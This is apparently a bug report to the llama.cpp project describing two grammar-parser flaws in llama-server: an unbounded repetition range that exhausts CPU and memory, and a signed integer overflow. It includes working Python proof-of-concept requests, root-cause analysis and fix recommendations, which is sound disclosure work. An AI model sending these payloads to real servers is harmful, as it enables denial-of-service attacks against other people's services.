Name and Version
./llama-cli --version
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (AMD EPYC 9654 96-Core Processor)
load_backend: failed to find ggml_backend_init in /data/ylwang/Projects/llama.cpp/build/bin/libggml-cpu.so
version: 7090 (0de8878)
built with cc (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0 for x86_64-linux-gnu
Operating systems
Linux
Which llama.cpp modules do you know to be affected?
llama-server
Command line
llama-server -m 0.gguf --host 0.0.0.0
Problem description & steps to reproduce
Bug 1: Unbounded Repetition Range Causes DoS
PoC
import requests

resp = requests.post(
    "http://localhost:8080/v1/chat/completions",
    json={
        "messages": [
            {"role": "user", "content": "\n" * 1}
        ],
        "max_tokens": 20,
        "grammar": "root ::= \"a\"{2000000000,2147483647}"
    }
)
print(resp.text)
Impact
This grammar triggers a repetition range of {2000000000, 2147483647}.
The grammar parser expands repetitions by iterating from the minimum to maximum count, resulting in over two billion iterations.
This leads to:
- 100% CPU utilization,
- unbounded memory growth due to repeated vector expansion,
- and a full Denial-of-Service (DoS) of the LLM server.
In realistic usage, repetition counts should never approach these magnitudes. Allowing users to specify arbitrary repetition bounds is unsafe and unnecessary.
Fix Recommendation
In ./llama.cpp/src/llama-grammar.cpp (line ~481):
int min_times = std::stoul(std::string(pos, int_end - pos));
A validation step should be added after parsing numeric values. For example, enforce a reasonable upper bound such as:
min_times <= 100000 and max_times <= 100000
This prevents pathological repetition ranges from causing DoS.
Bug 2: Signed Integer Overflow Due to Incorrect Type Usage
PoC
import requests

resp = requests.post(
    "http://localhost:8080/v1/chat/completions",
    json={
        "messages": [
            {"role": "user", "content": "\n" * 1}
        ],
        "max_tokens": 20,
        "grammar": "root ::= \"a\"{2147483648,2}"
    }
)
print(resp.text)
Server Output
/data/ylwang/Projects/llama.cpp/src/llama-grammar.cpp:382:36: runtime error: signed integer overflow: 2 - -2147483648 cannot be represented in type 'int'
Root Cause
At line ~481 in llama-grammar.cpp, the parser stores the result of std::stoul()—which returns an unsigned long—into an int:
int min_times = std::stoul(std::string(pos, int_end - pos));
When the user supplies:
{2147483648, 2}
std::stoul() correctly returns 2147483648, but storing this into a 32-bit signed int causes wrap-around to:
min_times = -2147483648
Later, at line ~382:
auto n_opt = max_times < 0 ? 1 : max_times - min_times;
the expression 2 - (-2147483648) causes a signed integer overflow, triggering UBSan warnings and entering undefined behavior.
Fix Recommendation
Same as Bug 1: numerical fields must be range-checked.
Alternatively, store min_times/max_times in a type that can safely hold the parsed values (e.g., uint64_t) and verify that they fit within an acceptable application-level bound.
First Bad Commit
No response